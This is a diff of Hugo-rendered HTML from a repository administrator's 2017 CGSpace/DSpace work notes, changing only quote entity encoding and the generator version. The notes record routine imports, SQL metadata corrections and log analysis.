<li>17 of the items have issues with incorrect page number ranges, and upon closer inspection the ranges do not appear in the referenced PDFs</li>
<li>I&rsquo;ve flagged them and proceeded without them (752 total) on DSpace Test:</li>
</ul>
<pre tabindex="0"><code>$ JAVA_OPTS=&quot;-Xmx1024m -Dfile.encoding=UTF-8&quot; [dspace]/bin/dspace import --add --eperson=aorth@mjanja.ch --collection=10568/93843 --source /home/aorth/src/CIAT-Books/SimpleArchiveFormat/ --mapfile=/tmp/ciat-books.map &amp;&gt; /tmp/ciat-books.log
<pre tabindex="0"><code>$ JAVA_OPTS=&#34;-Xmx1024m -Dfile.encoding=UTF-8&#34; [dspace]/bin/dspace import --add --eperson=aorth@mjanja.ch --collection=10568/93843 --source /home/aorth/src/CIAT-Books/SimpleArchiveFormat/ --mapfile=/tmp/ciat-books.map &amp;&gt; /tmp/ciat-books.log
</code></pre><ul>
<li>I went and did some basic sanity checks on the remaining items in the CIAT Book Chapters and decided they are mostly fine (except one duplicate and the flagged ones), so I imported them to DSpace Test too (162 items)</li>
<li>Total items in CIAT Book Chapters is 914, with the others being flagged for some reason, and we should send that back to CIAT</li>
@ -213,15 +213,15 @@
</li>
<li>Finally import 914 CIAT Book Chapters to CGSpace in two batches:</li>
</ul>
<pre tabindex="0"><code>$ JAVA_OPTS=&quot;-Xmx1024m -Dfile.encoding=UTF-8&quot; [dspace]/bin/dspace import --add --eperson=aorth@mjanja.ch --collection=10568/35701 --source /home/aorth/CIAT-Books/SimpleArchiveFormat/ --mapfile=/tmp/ciat-books.map &amp;&gt; /tmp/ciat-books.log
$ JAVA_OPTS=&quot;-Xmx1024m -Dfile.encoding=UTF-8&quot; [dspace]/bin/dspace import --add --eperson=aorth@mjanja.ch --collection=10568/35701 --source /home/aorth/CIAT-Books/SimpleArchiveFormat/ --mapfile=/tmp/ciat-books2.map &amp;&gt; /tmp/ciat-books2.log
<pre tabindex="0"><code>$ JAVA_OPTS=&#34;-Xmx1024m -Dfile.encoding=UTF-8&#34; [dspace]/bin/dspace import --add --eperson=aorth@mjanja.ch --collection=10568/35701 --source /home/aorth/CIAT-Books/SimpleArchiveFormat/ --mapfile=/tmp/ciat-books.map &amp;&gt; /tmp/ciat-books.log
$ JAVA_OPTS=&#34;-Xmx1024m -Dfile.encoding=UTF-8&#34; [dspace]/bin/dspace import --add --eperson=aorth@mjanja.ch --collection=10568/35701 --source /home/aorth/CIAT-Books/SimpleArchiveFormat/ --mapfile=/tmp/ciat-books2.map &amp;&gt; /tmp/ciat-books2.log
</code></pre><h2 id="2017-06-25">2017-06-25</h2>
<ul>
<li>WLE has said that one of their Phase II research themes is being renamed from <code>Regenerating Degraded Landscapes</code> to <code>Restoring Degraded Landscapes</code></li>
<li>Pull request with the changes to <code>input-forms.xml</code>: <a href="https://github.com/ilri/DSpace/pull/329">#329</a></li>
<li>As of now it doesn&rsquo;t look like there are any items using this research theme so we don&rsquo;t need to do any updates:</li>
</ul>
<pre tabindex="0"><code>dspace=# select text_value from metadatavalue where resource_type_id=2 and metadata_field_id=237 and text_value like 'Regenerating Degraded Landscapes%';
<pre tabindex="0"><code>dspace=# select text_value from metadatavalue where resource_type_id=2 and metadata_field_id=237 and text_value like &#39;Regenerating Degraded Landscapes%&#39;;
text_value
------------
(0 rows)


@ -36,7 +36,7 @@ Merge changes for WLE Phase II theme rename (#329)
Looking at extracting the metadata registries from ICARDA&rsquo;s MEL DSpace database so we can compare fields with CGSpace
We can use PostgreSQL&rsquo;s extended output format (-x) plus sed to format the output into quasi XML:
"/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -132,7 +132,7 @@ We can use PostgreSQL&rsquo;s extended output format (-x) plus sed to format the
<li>Looking at extracting the metadata registries from ICARDA&rsquo;s MEL DSpace database so we can compare fields with CGSpace</li>
<li>We can use PostgreSQL&rsquo;s extended output format (<code>-x</code>) plus <code>sed</code> to format the output into quasi XML:</li>
</ul>
<pre tabindex="0"><code>$ psql dspacenew -x -c 'select element, qualifier, scope_note from metadatafieldregistry where metadata_schema_id=5 order by element, qualifier;' | sed -r 's:^-\[ RECORD (.*) \]-+$:&lt;/dc-type&gt;\n&lt;dc-type&gt;\n&lt;schema&gt;cg&lt;/schema&gt;:;s:([^ ]*) +\| (.*): &lt;\1&gt;\2&lt;/\1&gt;:;s:^$:&lt;/dc-type&gt;:;1s:&lt;/dc-type&gt;\n::'
<pre tabindex="0"><code>$ psql dspacenew -x -c &#39;select element, qualifier, scope_note from metadatafieldregistry where metadata_schema_id=5 order by element, qualifier;&#39; | sed -r &#39;s:^-\[ RECORD (.*) \]-+$:&lt;/dc-type&gt;\n&lt;dc-type&gt;\n&lt;schema&gt;cg&lt;/schema&gt;:;s:([^ ]*) +\| (.*): &lt;\1&gt;\2&lt;/\1&gt;:;s:^$:&lt;/dc-type&gt;:;1s:&lt;/dc-type&gt;\n::&#39;
</code></pre><ul>
<li>The <code>sed</code> script is from a post on the <a href="https://www.postgresql.org/message-id/437E44A5.508%40ultimeth.com">PostgreSQL mailing list</a></li>
<li>Abenet says the ILRI board wants to be able to have &ldquo;lead author&rdquo; for every item, so I&rsquo;ve whipped up a WIP test in the <code>5_x-lead-author</code> branch</li>
@ -151,7 +151,7 @@ We can use PostgreSQL&rsquo;s extended output format (-x) plus sed to format the
<li>Adjust WLE Research Theme to include both Phase I and II on the submission form according to editor feedback (<a href="https://github.com/ilri/DSpace/pull/330">#330</a>)</li>
<li>Generate list of fields in the current CGSpace <code>cg</code> scheme so we can record them properly in the metadata registry:</li>
</ul>
<pre tabindex="0"><code>$ psql dspace -x -c 'select element, qualifier, scope_note from metadatafieldregistry where metadata_schema_id=2 order by element, qualifier;' | sed -r 's:^-\[ RECORD (.*) \]-+$:&lt;/dc-type&gt;\n&lt;dc-type&gt;\n&lt;schema&gt;cg&lt;/schema&gt;:;s:([^ ]*) +\| (.*): &lt;\1&gt;\2&lt;/\1&gt;:;s:^$:&lt;/dc-type&gt;:;1s:&lt;/dc-type&gt;\n::' &gt; cg-types.xml
<pre tabindex="0"><code>$ psql dspace -x -c &#39;select element, qualifier, scope_note from metadatafieldregistry where metadata_schema_id=2 order by element, qualifier;&#39; | sed -r &#39;s:^-\[ RECORD (.*) \]-+$:&lt;/dc-type&gt;\n&lt;dc-type&gt;\n&lt;schema&gt;cg&lt;/schema&gt;:;s:([^ ]*) +\| (.*): &lt;\1&gt;\2&lt;/\1&gt;:;s:^$:&lt;/dc-type&gt;:;1s:&lt;/dc-type&gt;\n::&#39; &gt; cg-types.xml
</code></pre><ul>
<li>CGSpace was unavailable briefly, and I saw this error in the DSpace log file:</li>
</ul>
@ -211,7 +211,7 @@ org.postgresql.util.PSQLException: FATAL: remaining connection slots are reserve
<ul>
<li>Move two top-level communities to be sub-communities of ILRI Projects</li>
</ul>
<pre tabindex="0"><code>$ for community in 10568/2347 10568/25209; do /home/cgspace.cgiar.org/bin/dspace community-filiator --set --parent=10568/27629 --child=&quot;$community&quot;; done
<pre tabindex="0"><code>$ for community in 10568/2347 10568/25209; do /home/cgspace.cgiar.org/bin/dspace community-filiator --set --parent=10568/27629 --child=&#34;$community&#34;; done
</code></pre><ul>
<li>Discuss CGIAR Library data cleanup with Sisay and Abenet</li>
</ul>
@ -241,16 +241,16 @@ org.postgresql.util.PSQLException: FATAL: remaining connection slots are reserve
<ul>
<li>Looks like the final list of metadata corrections for CCAFS project tags will be:</li>
</ul>
<pre tabindex="0"><code>delete from metadatavalue where resource_type_id=2 and metadata_field_id=235 and text_value='PII-FP4_CRMWestAfrica';
update metadatavalue set text_value='FP3_VietnamLED' where resource_type_id=2 and metadata_field_id=134 and text_value='FP3_VeitnamLED';
update metadatavalue set text_value='PII-FP1_PIRCCA' where resource_type_id=2 and metadata_field_id=235 and text_value='PII-SEA_PIRCCA';
delete from metadatavalue where resource_type_id=2 and metadata_field_id=235 and text_value='PII-WA_IntegratedInterventions';
<pre tabindex="0"><code>delete from metadatavalue where resource_type_id=2 and metadata_field_id=235 and text_value=&#39;PII-FP4_CRMWestAfrica&#39;;
update metadatavalue set text_value=&#39;FP3_VietnamLED&#39; where resource_type_id=2 and metadata_field_id=134 and text_value=&#39;FP3_VeitnamLED&#39;;
update metadatavalue set text_value=&#39;PII-FP1_PIRCCA&#39; where resource_type_id=2 and metadata_field_id=235 and text_value=&#39;PII-SEA_PIRCCA&#39;;
delete from metadatavalue where resource_type_id=2 and metadata_field_id=235 and text_value=&#39;PII-WA_IntegratedInterventions&#39;;
</code></pre><ul>
<li>Now just waiting to run them on CGSpace, and then apply the modified input forms after Macaroni Bros give me an updated list</li>
<li>Temporarily increase the nginx upload limit to 200MB for Sisay to upload the CIAT presentations</li>
<li>Looking at the CGSpace activity page, there are 52 Baidu bots concurrently crawling our website (I copied the activity page to a text file and grepped it)!</li>
</ul>
<pre tabindex="0"><code>$ grep 180.76. /tmp/status | awk '{print $5}' | sort | uniq | wc -l
<pre tabindex="0"><code>$ grep 180.76. /tmp/status | awk &#39;{print $5}&#39; | sort | uniq | wc -l
52
</code></pre><ul>
<li>From looking at the <code>dspace.log</code> I see they are all using the same session, which means our Crawler Session Manager Valve is working</li>
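<li>A way to double check this (a sketch; the log date is hypothetical) is to count distinct session IDs for Baidu&rsquo;s IP range in the DSpace log:</li>
</ul>
<pre tabindex="0"><code>$ grep -a 180.76. /home/cgspace.cgiar.org/log/dspace.log.2017-07-24 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort | uniq | wc -l
</code></pre>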


@ -60,7 +60,7 @@ This was due to newline characters in the dc.description.abstract column, which
I exported a new CSV from the collection on DSpace Test and then manually removed the characters in vim using g/^$/d
Then I cleaned up the author authorities and HTML characters in OpenRefine and sent the file back to Abenet
"/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -215,7 +215,7 @@ Then I cleaned up the author authorities and HTML characters in OpenRefine and s
<li>I need to get an author list from the database for only the CGIAR Library community to send to Peter</li>
<li>It turns out that I had already used this SQL query in <a href="/cgspace-notes/2017-05">May, 2017</a> to get the authors from CGIAR Library:</li>
</ul>
<pre tabindex="0"><code>dspace#= \copy (select distinct text_value, count(*) from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author') AND resource_type_id = 2 AND resource_id IN (select item_id from collection2item where collection_id IN (select resource_id from handle where handle in ('10568/93761', '10947/1', '10947/10', '10947/11', '10947/12', '10947/13', '10947/14', '10947/15', '10947/16', '10947/17', '10947/18', '10947/19', '10947/2', '10947/20', '10947/21', '10947/22', '10947/23', '10947/24', '10947/25', '10947/2512', '10947/2515', '10947/2516', '10947/2517', '10947/2518', '10947/2519', '10947/2520', '10947/2521', '10947/2522', '10947/2523', '10947/2524', '10947/2525', '10947/2526', '10947/2527', '10947/2528', '10947/2529', '10947/2530', '10947/2531', '10947/2532', '10947/2533', '10947/2534', '10947/2535', '10947/2536', '10947/2537', '10947/2538', '10947/2539', '10947/2540', '10947/2541', '10947/2589', '10947/26', '10947/2631', '10947/27', '10947/2708', '10947/2776', '10947/2782', '10947/2784', '10947/2786', '10947/2790', '10947/28', '10947/2805', '10947/2836', '10947/2871', '10947/2878', '10947/29', '10947/2900', '10947/2919', '10947/3', '10947/30', '10947/31', '10947/32', '10947/33', '10947/34', '10947/3457', '10947/35', '10947/36', '10947/37', '10947/38', '10947/39', '10947/4', '10947/40', '10947/4052', '10947/4054', '10947/4056', '10947/4068', '10947/41', '10947/42', '10947/43', '10947/4368', '10947/44', '10947/4467', '10947/45', '10947/4508', '10947/4509', '10947/4510', '10947/4573', '10947/46', '10947/4635', '10947/4636', '10947/4637', '10947/4638', '10947/4639', '10947/4651', '10947/4657', '10947/47', '10947/48', '10947/49', '10947/5', '10947/50', '10947/51', '10947/5308', '10947/5322', '10947/5324', '10947/5326', '10947/6', '10947/7', '10947/8', '10947/9'))) group by text_value order by count desc) to /tmp/cgiar-library-authors.csv with csv;
<pre tabindex="0"><code>dspace#= \copy (select distinct text_value, count(*) from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;contributor&#39; and qualifier = &#39;author&#39;) AND resource_type_id = 2 AND resource_id IN (select item_id from collection2item where collection_id IN (select resource_id from handle where handle in (&#39;10568/93761&#39;, &#39;10947/1&#39;, &#39;10947/10&#39;, &#39;10947/11&#39;, &#39;10947/12&#39;, &#39;10947/13&#39;, &#39;10947/14&#39;, &#39;10947/15&#39;, &#39;10947/16&#39;, &#39;10947/17&#39;, &#39;10947/18&#39;, &#39;10947/19&#39;, &#39;10947/2&#39;, &#39;10947/20&#39;, &#39;10947/21&#39;, &#39;10947/22&#39;, &#39;10947/23&#39;, &#39;10947/24&#39;, &#39;10947/25&#39;, &#39;10947/2512&#39;, &#39;10947/2515&#39;, &#39;10947/2516&#39;, &#39;10947/2517&#39;, &#39;10947/2518&#39;, &#39;10947/2519&#39;, &#39;10947/2520&#39;, &#39;10947/2521&#39;, &#39;10947/2522&#39;, &#39;10947/2523&#39;, &#39;10947/2524&#39;, &#39;10947/2525&#39;, &#39;10947/2526&#39;, &#39;10947/2527&#39;, &#39;10947/2528&#39;, &#39;10947/2529&#39;, &#39;10947/2530&#39;, &#39;10947/2531&#39;, &#39;10947/2532&#39;, &#39;10947/2533&#39;, &#39;10947/2534&#39;, &#39;10947/2535&#39;, &#39;10947/2536&#39;, &#39;10947/2537&#39;, &#39;10947/2538&#39;, &#39;10947/2539&#39;, &#39;10947/2540&#39;, &#39;10947/2541&#39;, &#39;10947/2589&#39;, &#39;10947/26&#39;, &#39;10947/2631&#39;, &#39;10947/27&#39;, &#39;10947/2708&#39;, &#39;10947/2776&#39;, &#39;10947/2782&#39;, &#39;10947/2784&#39;, &#39;10947/2786&#39;, &#39;10947/2790&#39;, &#39;10947/28&#39;, &#39;10947/2805&#39;, &#39;10947/2836&#39;, &#39;10947/2871&#39;, &#39;10947/2878&#39;, &#39;10947/29&#39;, &#39;10947/2900&#39;, &#39;10947/2919&#39;, &#39;10947/3&#39;, &#39;10947/30&#39;, &#39;10947/31&#39;, &#39;10947/32&#39;, &#39;10947/33&#39;, &#39;10947/34&#39;, &#39;10947/3457&#39;, &#39;10947/35&#39;, &#39;10947/36&#39;, &#39;10947/37&#39;, &#39;10947/38&#39;, &#39;10947/39&#39;, &#39;10947/4&#39;, &#39;10947/40&#39;, &#39;10947/4052&#39;, &#39;10947/4054&#39;, &#39;10947/4056&#39;, &#39;10947/4068&#39;, &#39;10947/41&#39;, &#39;10947/42&#39;, &#39;10947/43&#39;, &#39;10947/4368&#39;, &#39;10947/44&#39;, &#39;10947/4467&#39;, &#39;10947/45&#39;, &#39;10947/4508&#39;, &#39;10947/4509&#39;, &#39;10947/4510&#39;, &#39;10947/4573&#39;, &#39;10947/46&#39;, &#39;10947/4635&#39;, &#39;10947/4636&#39;, &#39;10947/4637&#39;, &#39;10947/4638&#39;, &#39;10947/4639&#39;, &#39;10947/4651&#39;, &#39;10947/4657&#39;, &#39;10947/47&#39;, &#39;10947/48&#39;, &#39;10947/49&#39;, &#39;10947/5&#39;, &#39;10947/50&#39;, &#39;10947/51&#39;, &#39;10947/5308&#39;, &#39;10947/5322&#39;, &#39;10947/5324&#39;, &#39;10947/5326&#39;, &#39;10947/6&#39;, &#39;10947/7&#39;, &#39;10947/8&#39;, &#39;10947/9&#39;))) group by text_value order by count desc) to /tmp/cgiar-library-authors.csv with csv;
</code></pre><ul>
<li>Meeting with Peter and CGSpace team
<ul>
@ -242,7 +242,7 @@ Then I cleaned up the author authorities and HTML characters in OpenRefine and s
<li>I sent a message to the mailing list about the duplicate content issue with <code>/rest</code> and <code>/bitstream</code> URLs</li>
<li>Looking at the logs for the REST API on <code>/rest</code>, it looks like there is someone hammering doing testing or something on it&hellip;</li>
</ul>
<pre tabindex="0"><code># awk '{print $1}' /var/log/nginx/rest.log.1 | sort -n | uniq -c | sort -h | tail -n 5
<pre tabindex="0"><code># awk &#39;{print $1}&#39; /var/log/nginx/rest.log.1 | sort -n | uniq -c | sort -h | tail -n 5
140 66.249.66.91
404 66.249.66.90
1479 50.116.102.77
@ -270,9 +270,9 @@ Then I cleaned up the author authorities and HTML characters in OpenRefine and s
</code></pre><ul>
<li>There were only three deletions so I just did them manually:</li>
</ul>
<pre tabindex="0"><code>dspace=# delete from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value='C';
<pre tabindex="0"><code>dspace=# delete from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value=&#39;C&#39;;
DELETE 1
dspace=# delete from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value='WSSD';
dspace=# delete from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value=&#39;WSSD&#39;;
</code></pre><ul>
<li>Generate a new list of authors from the CGIAR Library community for Peter to look through now that the initial corrections have been done</li>
<li>Thinking about resource limits for PostgreSQL again after last week&rsquo;s CGSpace crash and related to a recently discussion I had in the comments of the <a href="https://wiki.lyrasis.org/display/cmtygp/DCAT+Meeting+April+2017">April, 2017 DCAT meeting notes</a></li>
@ -324,22 +324,22 @@ $ grep -rsI SQLException dspace-xmlui | wc -l
</code></pre><ul>
<li>And actually, we can do it for other generic fields for items in those collections, for example <code>dc.description.abstract</code>:</li>
</ul>
<pre tabindex="0"><code>dspace=# update metadatavalue set text_lang='en_US' where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'description' and qualifier = 'abstract') AND resource_type_id = 2 AND resource_id IN (select item_id from collection2item where collection_id IN (select resource_id from handle where handle in ('10568/93761', '10947/1', '10947/10', '10947/11', '10947/12', '10947/13', '10947/14', '10947/15', '10947/16', '10947/17', '10947/18', '10947/19', '10947/2', '10947/20', '10947/21', '10947/22', '10947/23', '10947/24', '10947/25', '10947/2512', '10947/2515', '10947/2516', '10947/2517', '10947/2518', '10947/2519', '10947/2520', '10947/2521', '10947/2522', '10947/2523', '10947/2524', '10947/2525', '10947/2526', '10947/2527', '10947/2528', '10947/2529', '10947/2530', '10947/2531', '10947/2532', '10947/2533', '10947/2534', '10947/2535', '10947/2536', '10947/2537', '10947/2538', '10947/2539', '10947/2540', '10947/2541', '10947/2589', '10947/26', '10947/2631', '10947/27', '10947/2708', '10947/2776', '10947/2782', '10947/2784', '10947/2786', '10947/2790', '10947/28', '10947/2805', '10947/2836', '10947/2871', '10947/2878', '10947/29', '10947/2900', '10947/2919', '10947/3', '10947/30', '10947/31', '10947/32', '10947/33', '10947/34', '10947/3457', '10947/35', '10947/36', '10947/37', '10947/38', '10947/39', '10947/4', '10947/40', '10947/4052', '10947/4054', '10947/4056', '10947/4068', '10947/41', '10947/42', '10947/43', '10947/4368', '10947/44', '10947/4467', '10947/45', '10947/4508', '10947/4509', '10947/4510', '10947/4573', '10947/46', '10947/4635', '10947/4636', '10947/4637', '10947/4638', '10947/4639', '10947/4651', '10947/4657', '10947/47', '10947/48', '10947/49', '10947/5', '10947/50', '10947/51', '10947/5308', '10947/5322', '10947/5324', '10947/5326', '10947/6', '10947/7', '10947/8', '10947/9')))
<pre tabindex="0"><code>dspace=# update metadatavalue set text_lang=&#39;en_US&#39; where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;description&#39; and qualifier = &#39;abstract&#39;) AND resource_type_id = 2 AND resource_id IN (select item_id from collection2item where collection_id IN (select resource_id from handle where handle in (&#39;10568/93761&#39;, &#39;10947/1&#39;, &#39;10947/10&#39;, &#39;10947/11&#39;, &#39;10947/12&#39;, &#39;10947/13&#39;, &#39;10947/14&#39;, &#39;10947/15&#39;, &#39;10947/16&#39;, &#39;10947/17&#39;, &#39;10947/18&#39;, &#39;10947/19&#39;, &#39;10947/2&#39;, &#39;10947/20&#39;, &#39;10947/21&#39;, &#39;10947/22&#39;, &#39;10947/23&#39;, &#39;10947/24&#39;, &#39;10947/25&#39;, &#39;10947/2512&#39;, &#39;10947/2515&#39;, &#39;10947/2516&#39;, &#39;10947/2517&#39;, &#39;10947/2518&#39;, &#39;10947/2519&#39;, &#39;10947/2520&#39;, &#39;10947/2521&#39;, &#39;10947/2522&#39;, &#39;10947/2523&#39;, &#39;10947/2524&#39;, &#39;10947/2525&#39;, &#39;10947/2526&#39;, &#39;10947/2527&#39;, &#39;10947/2528&#39;, &#39;10947/2529&#39;, &#39;10947/2530&#39;, &#39;10947/2531&#39;, &#39;10947/2532&#39;, &#39;10947/2533&#39;, &#39;10947/2534&#39;, &#39;10947/2535&#39;, &#39;10947/2536&#39;, &#39;10947/2537&#39;, &#39;10947/2538&#39;, &#39;10947/2539&#39;, &#39;10947/2540&#39;, &#39;10947/2541&#39;, &#39;10947/2589&#39;, &#39;10947/26&#39;, &#39;10947/2631&#39;, &#39;10947/27&#39;, &#39;10947/2708&#39;, &#39;10947/2776&#39;, &#39;10947/2782&#39;, &#39;10947/2784&#39;, &#39;10947/2786&#39;, &#39;10947/2790&#39;, &#39;10947/28&#39;, &#39;10947/2805&#39;, &#39;10947/2836&#39;, &#39;10947/2871&#39;, &#39;10947/2878&#39;, &#39;10947/29&#39;, &#39;10947/2900&#39;, &#39;10947/2919&#39;, &#39;10947/3&#39;, &#39;10947/30&#39;, &#39;10947/31&#39;, &#39;10947/32&#39;, &#39;10947/33&#39;, &#39;10947/34&#39;, &#39;10947/3457&#39;, &#39;10947/35&#39;, &#39;10947/36&#39;, &#39;10947/37&#39;, &#39;10947/38&#39;, &#39;10947/39&#39;, &#39;10947/4&#39;, &#39;10947/40&#39;, &#39;10947/4052&#39;, &#39;10947/4054&#39;, &#39;10947/4056&#39;, &#39;10947/4068&#39;, &#39;10947/41&#39;, &#39;10947/42&#39;, &#39;10947/43&#39;, &#39;10947/4368&#39;, &#39;10947/44&#39;, &#39;10947/4467&#39;, &#39;10947/45&#39;, &#39;10947/4508&#39;, &#39;10947/4509&#39;, &#39;10947/4510&#39;, &#39;10947/4573&#39;, &#39;10947/46&#39;, &#39;10947/4635&#39;, &#39;10947/4636&#39;, &#39;10947/4637&#39;, &#39;10947/4638&#39;, &#39;10947/4639&#39;, &#39;10947/4651&#39;, &#39;10947/4657&#39;, &#39;10947/47&#39;, &#39;10947/48&#39;, &#39;10947/49&#39;, &#39;10947/5&#39;, &#39;10947/50&#39;, &#39;10947/51&#39;, &#39;10947/5308&#39;, &#39;10947/5322&#39;, &#39;10947/5324&#39;, &#39;10947/5326&#39;, &#39;10947/6&#39;, &#39;10947/7&#39;, &#39;10947/8&#39;, &#39;10947/9&#39;)))
</code></pre><ul>
<li>And on others like <code>dc.language.iso</code>, <code>dc.relation.ispartofseries</code>, <code>dc.type</code>, <code>dc.title</code>, etc&hellip;</li>
<li>Also, to move fields from <code>dc.identifier.url</code> to <code>cg.identifier.url[en_US]</code> (because we don&rsquo;t use the Dublin Core one for some reason):</li>
</ul>
<pre tabindex="0"><code>dspace=# update metadatavalue set metadata_field_id = 219, text_lang = 'en_US' where resource_type_id = 2 AND metadata_field_id = 237;
<pre tabindex="0"><code>dspace=# update metadatavalue set metadata_field_id = 219, text_lang = &#39;en_US&#39; where resource_type_id = 2 AND metadata_field_id = 237;
UPDATE 15
</code></pre><ul>
<li>Set the text_lang of all <code>dc.identifier.uri</code> (Handle) fields to be NULL, just like default DSpace does:</li>
</ul>
<pre tabindex="0"><code>dspace=# update metadatavalue set text_lang=NULL where resource_type_id = 2 and metadata_field_id = 25 and text_value like 'http://hdl.handle.net/10947/%';
<pre tabindex="0"><code>dspace=# update metadatavalue set text_lang=NULL where resource_type_id = 2 and metadata_field_id = 25 and text_value like &#39;http://hdl.handle.net/10947/%&#39;;
UPDATE 4248
</code></pre><ul>
<li>Also update the text_lang of <code>dc.contributor.author</code> fields for metadata in these collections:</li>
</ul>
<pre tabindex="0"><code>dspace=# update metadatavalue set text_lang=NULL where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author') AND resource_type_id = 2 AND resource_id IN (select item_id from collection2item where collection_id IN (select resource_id from handle where handle in ('10568/93761', '10947/1', '10947/10', '10947/11', '10947/12', '10947/13', '10947/14', '10947/15', '10947/16', '10947/17', '10947/18', '10947/19', '10947/2', '10947/20', '10947/21', '10947/22', '10947/23', '10947/24', '10947/25', '10947/2512', '10947/2515', '10947/2516', '10947/2517', '10947/2518', '10947/2519', '10947/2520', '10947/2521', '10947/2522', '10947/2523', '10947/2524', '10947/2525', '10947/2526', '10947/2527', '10947/2528', '10947/2529', '10947/2530', '10947/2531', '10947/2532', '10947/2533', '10947/2534', '10947/2535', '10947/2536', '10947/2537', '10947/2538', '10947/2539', '10947/2540', '10947/2541', '10947/2589', '10947/26', '10947/2631', '10947/27', '10947/2708', '10947/2776', '10947/2782', '10947/2784', '10947/2786', '10947/2790', '10947/28', '10947/2805', '10947/2836', '10947/2871', '10947/2878', '10947/29', '10947/2900', '10947/2919', '10947/3', '10947/30', '10947/31', '10947/32', '10947/33', '10947/34', '10947/3457', '10947/35', '10947/36', '10947/37', '10947/38', '10947/39', '10947/4', '10947/40', '10947/4052', '10947/4054', '10947/4056', '10947/4068', '10947/41', '10947/42', '10947/43', '10947/4368', '10947/44', '10947/4467', '10947/45', '10947/4508', '10947/4509', '10947/4510', '10947/4573', '10947/46', '10947/4635', '10947/4636', '10947/4637', '10947/4638', '10947/4639', '10947/4651', '10947/4657', '10947/47', '10947/48', '10947/49', '10947/5', '10947/50', '10947/51', '10947/5308', '10947/5322', '10947/5324', '10947/5326', '10947/6', '10947/7', '10947/8', '10947/9')));
<pre tabindex="0"><code>dspace=# update metadatavalue set text_lang=NULL where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;contributor&#39; and qualifier = &#39;author&#39;) AND resource_type_id = 2 AND resource_id IN (select item_id from collection2item where collection_id IN (select resource_id from handle where handle in (&#39;10568/93761&#39;, &#39;10947/1&#39;, &#39;10947/10&#39;, &#39;10947/11&#39;, &#39;10947/12&#39;, &#39;10947/13&#39;, &#39;10947/14&#39;, &#39;10947/15&#39;, &#39;10947/16&#39;, &#39;10947/17&#39;, &#39;10947/18&#39;, &#39;10947/19&#39;, &#39;10947/2&#39;, &#39;10947/20&#39;, &#39;10947/21&#39;, &#39;10947/22&#39;, &#39;10947/23&#39;, &#39;10947/24&#39;, &#39;10947/25&#39;, &#39;10947/2512&#39;, &#39;10947/2515&#39;, &#39;10947/2516&#39;, &#39;10947/2517&#39;, &#39;10947/2518&#39;, &#39;10947/2519&#39;, &#39;10947/2520&#39;, &#39;10947/2521&#39;, &#39;10947/2522&#39;, &#39;10947/2523&#39;, &#39;10947/2524&#39;, &#39;10947/2525&#39;, &#39;10947/2526&#39;, &#39;10947/2527&#39;, &#39;10947/2528&#39;, &#39;10947/2529&#39;, &#39;10947/2530&#39;, &#39;10947/2531&#39;, &#39;10947/2532&#39;, &#39;10947/2533&#39;, &#39;10947/2534&#39;, &#39;10947/2535&#39;, &#39;10947/2536&#39;, &#39;10947/2537&#39;, &#39;10947/2538&#39;, &#39;10947/2539&#39;, &#39;10947/2540&#39;, &#39;10947/2541&#39;, &#39;10947/2589&#39;, &#39;10947/26&#39;, &#39;10947/2631&#39;, &#39;10947/27&#39;, &#39;10947/2708&#39;, &#39;10947/2776&#39;, &#39;10947/2782&#39;, &#39;10947/2784&#39;, &#39;10947/2786&#39;, &#39;10947/2790&#39;, &#39;10947/28&#39;, &#39;10947/2805&#39;, &#39;10947/2836&#39;, &#39;10947/2871&#39;, &#39;10947/2878&#39;, &#39;10947/29&#39;, &#39;10947/2900&#39;, &#39;10947/2919&#39;, &#39;10947/3&#39;, &#39;10947/30&#39;, &#39;10947/31&#39;, &#39;10947/32&#39;, &#39;10947/33&#39;, &#39;10947/34&#39;, &#39;10947/3457&#39;, &#39;10947/35&#39;, &#39;10947/36&#39;, &#39;10947/37&#39;, &#39;10947/38&#39;, &#39;10947/39&#39;, &#39;10947/4&#39;, &#39;10947/40&#39;, &#39;10947/4052&#39;, &#39;10947/4054&#39;, &#39;10947/4056&#39;, &#39;10947/4068&#39;, &#39;10947/41&#39;, &#39;10947/42&#39;, &#39;10947/43&#39;, &#39;10947/4368&#39;, &#39;10947/44&#39;, &#39;10947/4467&#39;, &#39;10947/45&#39;, &#39;10947/4508&#39;, &#39;10947/4509&#39;, &#39;10947/4510&#39;, &#39;10947/4573&#39;, &#39;10947/46&#39;, &#39;10947/4635&#39;, &#39;10947/4636&#39;, &#39;10947/4637&#39;, &#39;10947/4638&#39;, &#39;10947/4639&#39;, &#39;10947/4651&#39;, &#39;10947/4657&#39;, &#39;10947/47&#39;, &#39;10947/48&#39;, &#39;10947/49&#39;, &#39;10947/5&#39;, &#39;10947/50&#39;, &#39;10947/51&#39;, &#39;10947/5308&#39;, &#39;10947/5322&#39;, &#39;10947/5324&#39;, &#39;10947/5326&#39;, &#39;10947/6&#39;, &#39;10947/7&#39;, &#39;10947/8&#39;, &#39;10947/9&#39;)));
UPDATE 4899
</code></pre><ul>
<li>Wow, I just wrote this baller regex facet to find duplicate authors:</li>
@ -370,7 +370,7 @@ java.io.StreamCorruptedException: invalid stream header: 00000000
</code></pre><ul>
<li>Weird that these errors seem to have started on August 11th, the same day we had capacity issues with PostgreSQL:</li>
</ul>
<pre tabindex="0"><code># grep -c &quot;ERROR net.sf.ehcache.store.DiskStore&quot; dspace.log.2017-08-*
<pre tabindex="0"><code># grep -c &#34;ERROR net.sf.ehcache.store.DiskStore&#34; dspace.log.2017-08-*
dspace.log.2017-08-01:0
dspace.log.2017-08-02:0
dspace.log.2017-08-03:0
@ -418,7 +418,7 @@ SELECT
?label
WHERE {
{ ?concept skos:altLabel ?label . } UNION { ?concept skos:prefLabel ?label . }
